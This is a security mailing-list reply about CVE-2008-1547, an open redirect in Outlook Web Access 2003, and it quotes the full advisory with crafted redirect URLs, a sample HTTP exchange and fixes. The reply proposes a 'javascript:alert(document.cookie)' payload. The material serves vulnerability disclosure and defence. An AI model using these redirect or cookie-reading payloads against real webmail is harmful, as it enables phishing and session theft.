<<< Date Index >>>     <<< Thread Index >>>

Re: MS OWA 2003 Redirection Vulnerability



Did you try setting it to :

javascript:alert(document.cookie) 

If there are no/dumb filters you'll get

<!--Copyright (c) 2000-2003 Microsoft Corporation.  All rights
reserved.-->
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8">
<html><head>
<script>
        try
        {
                window.location = "javascript:alert(document.cookie)";
        }
        catch(e){}
</script>
</head>
</html>

which is better than a simple redirection.

Sorry but at the moment I cannot check it by myself.

Cheers,
Stefano

Il giorno mer, 15/10/2008 alle 11.18 +0200, Martin Suess ha scritto:
> #############################################################
> #
> # COMPASS SECURITY ADVISORY
> # http://www.csnc.ch/en/downloads/advisories.html
> #
> #############################################################
> #
> # Product:   Outlook Web Access for Exchange 2003
> # Vendor:    Microsoft (www.microsoft.com)
> # CVD ID:    CVE-2008-1547
> # Subject:   URL Redirection Vulnerability
> # Risk:      Medium
> # Effect:    Remotely exploitable
> # Author:    Martin Suess <martin.suess@xxxxxxx>
> # Date:      October 15th 2008
> #
> #############################################################
> 
> Introduction:
> -------------
> The vulnerability found targets the Outlook Web Access application
> for Microsoft Exchange 2003. A valid user can be redirected to a
> malicious website when clicking on a specially crafted URL which can
> be sent to the user by email. If the user is logged in,
> he is redirected instantly - if he is not logged in yet, the login page
> will be displayed and he will be redirected after successful login.
> This vulnerability can be used to redirect the user to a phishing
> website which shows the (faked) login screen and getting the users
> logon credentials as soon as he tries to log in on the faked site.
> 
> Affected:
> ---------
> - All tested versions that are vulnerable
>       Microsoft Outlook Web Access for Exchange 2003 Server
>       (Version: 6.5, Build: 7638.2  SP2)
> - All tested versions that are not vulnerable
>       [no more tested]
> - Not affected according to vendor:
>       Microsoft Outlook Web Access for Exchange 2007 Server, SP1
> 
> Technical Description:
> ----------------------
> An attacker can craft a URL for the OWA of his victim which contains a
> redirection URL to which the user is sent after successful login. This
> URL can be sent to the victim by mail to either a private address or to
> the Exchange business account. Once he clicks on the URL he is
> redirected to a malicious website an attacker prepared containing a
> faked logon screen saying "your session has expired" or similar. If the
> user tries to log in again (on the faked logon page) his credentials
> are compromised.
> 
> Outlook Web Access for Exchange 2003
> 
> The URL could look like this:
> https://webmail.domain.tld/exchweb/bin/redir.asp?URL=http://www.csnc.ch
> 
> We request the page (authenticated user):
> GET
> https://webmail.domain.tld/exchweb/bin/redir.asp?URL=http://www.csnc.ch
> HTTP/1.1
> Host: webmail.domain.tld
> User-Agent: Mozilla/5.0 (Windows) Gecko/20080201 Firefox/2.0.0.12
> Accept: text/xml,application/xml,application/xhtml+xml
> Accept-Language: en-us,en;q=0.5
> Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
> Keep-Alive: 300
> Connection: keep-alive
> Cookie: sessionid=[...]; cadata="[...]"
> 
> And we get a redirection to the website defined:
> HTTP/1.1 200 OK
> Cache-Control: No-cache
> Content-Length: 277
> Content-Type: text/html
> Expires: Fri, 28 Mar 2008 08:53:11 GMT
> Server: Microsoft-IIS/6.0
> X-Powered-By: ASP.NET
> Date: Fri, 28 Mar 2008 08:54:10 GMT
> 
> <!--Copyright (c) 2000-2003 Microsoft Corporation.  All rights reserved.-->
> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8">
> <html>
> <head>
> <script>
>       try
>       {
>               window.location = "http:\/\/www.csnc.ch";
>       }
>       catch(e){}
> </script>
> </head>
> </html>
> 
> If the user is not authorized he will be redirected automatically to
> the following URL:
> https://webmail.domain.tld/exchweb/bin/auth/owalogon.asp?url=
> https://webmail.domain.tld/exchweb/bin/redir.asp%3FURL=
> http://www.csnc.ch&reason=0
> 
> As soon as he authenticates successfully he is redirected to the
> foreign website as well.
> 
> Outlook Web Access for Exchange 2007
> 
> Nearly the same issue can be found in Outlook Web Access for Exchange
> 2007. The URL additionally contains an additional parameter C which is
> needed because otherwise the page warns that a foreign website is
> opened. If the parameter is there, we are not warned when we are
> redirected:
> 
> https://webmail.domain.tld/owa/redir.aspx?
> C=efb6ad0a2be24a368596c275b5e4ae8d&URL=http%3a%2f%2fwww.csnc.ch%2f
> 
> Still, if we leave it away, it's only a pop-up which is clicked
> away and the redirection is still done.
> 
> If the user is not logged on when he clicks on the specially crafted
> URL, he is also redirected to the logon screen and redirected after
> successful login (including the warning pop-up):
> 
> https://webmail.domain.tld/owa/auth/logon.aspx?url=
> https://webmail.domain.tld/owa/redir.aspx%3F
> C=asdf%26URL=http%253a%252f%252f
> www.csnc.ch%252f&reason=0
> 
> According to Microsoft, Outlook Web Access 2007 SP1 is not affected.
> as it will not allow a link to point to inside the OWA URL namespace.
> 
> Workaround / Fix:
> -----------------
> Patching the application would mean that no more redirections to
> foreign websites are allowed anymore at all.
> A more sophisticated way of redirection would be to add a unique
> random id to each redirection URL which is connected to the session
> id and the URL. The URL does NOT contain the foreign URL anymore - it
> is only stored in the session. If the unique id does not match the URL
> stored in the session database the redirection is denied. Upon all
> redirections to foreign websites the user is warned with a pop-up.
> This does not solve the problem completely however because URLs sent
> to the webmail directly can still lead to malicious websites.
> 
> As long as there is no patch available we recommend using a web entry
> server in front of Outlook Web Access which filters malicious URLs.
> Redirection URLs must always start with the FQDN of the webmail
> application:
> https://webmail.domain.tld/exchweb/bin/auth/owalogon.asp?url=
> https://webmail.domain.tld/[...]
> 
> Microsoft also states correctly, that after the attack, the browser
> will no longer show the correct URL of the OWA in the address bar.
> The SSL certificate will also change or not be present anymore at
> all, depending on whether the attacker's page is encrypted or not.
> 
> Timeline:
> ---------
> Vendor Status:      MSRC tracking case closed
> Vendor Notified:    March 31st 2008
> Vendor Response:    May 6th 2008
> Advisory Release:   October 15th 2008
> Patch available:    - (vulnerability not high priority)
> 
> Acknowledgement:
> ----------------
> -
> 
> References:
> -----------
> [1]:   http://www.microsoft.com/exchange/
> [2]:   http://msexchangeteam.com/archive/2004/07/26/197289.aspx

-- 
...oOOo...oOOo....
Stefano Di Paola
Software & Security Engineer

Owasp Italy R&D Director

Web: www.wisec.it
..................